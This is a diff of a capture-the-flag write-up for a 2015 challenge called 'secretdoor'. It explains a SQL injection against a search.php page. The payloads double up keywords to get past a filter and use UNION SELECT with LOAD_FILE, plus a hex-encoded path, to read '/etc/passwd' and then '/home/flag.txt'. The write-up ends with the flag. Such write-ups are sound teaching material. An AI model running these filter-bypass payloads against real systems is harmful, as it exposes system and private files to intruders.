Execut3/CTF/Held-CTF/APA/2015/secretdoor/README.md

 SO the query in search.php, should be like this:

 ```
--1%' oorr 1=2 uniunionon selselectect 1,(seselectlect loaload_filed_file('/etc/passwd')),3#
+-1%' oorr 1=2 uniunionon selselectect 1,(seselectlect loaload_filed_file('/home/flag.txt')),3#
 ```

 But this doesn't work.
-We should find a way to read it.
-And we can do that by hexing the '/etc/passwd'. so the last query will look like this:
+We should find a way to read it. we can achieve this by hexing the '/home/flag.txt'.
+So the last query will look like this:

 ```
--1%' oorr 1=2 uniunionon selselectect 1,(seselectlect loaload_filed_file(0x2f6574632f706173737764)),3#
+-1%' oorr 1=2 uniunionon selselectect 1,(seselectlect loaload_filed_file(0x2f686f6d652f666c61672e747874)),3#
 ```

 And we will see the flag: **SQLI_is_M0R3_Than_AweS0M3**